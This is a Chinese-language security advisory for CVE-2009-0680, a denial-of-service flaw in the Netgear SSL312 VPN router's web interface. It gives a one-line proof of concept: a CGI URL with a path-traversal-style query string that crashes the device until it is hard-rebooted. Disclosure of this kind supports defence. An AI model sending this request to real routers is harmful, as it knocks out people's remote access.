发布日期：2009-02-06
更新日期：2009-02-11

受影响系统：

Netgear SSL312

描述：

---

BUGTRAQ  ID: 33675
CVE(CAN) ID: CVE-2009-0680

Netgear SSL312可以为用户提供简单、安全、高效的远程接入服务。

SSL312 VPN路由器的Web接口存在拒绝服务漏洞。如果远程攻击者向该接口上可访问的一个专用CGI二进制程序提交了特制的HTTP请求的话，就会导致设备崩溃。

<*来源：Rembrandt
  
  链接：http://marc.info/?l=full-disclosure&m=123413862616940&q=p7
        http://secunia.com/advisories/33896/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

* 访问SSL312 VPN路由器的管理界面，可看到登录和口令字段。随意输入数据并继续。

URL包含有类似于以下的路径：
https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?err=VXNlciBMb2dpbiBGYWlsZWQ=

如下修改URL并重新发送http请求，设备会崩溃，需要硬重启才能恢复。
https://xxx.xxx.xxx.xxx/cgi-bin/welcome/VPN_only?../../../../../

建议：

---

厂商补丁：

Netgear
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netgear.com/

浏览次数：2434
严重程度：0（网友投票）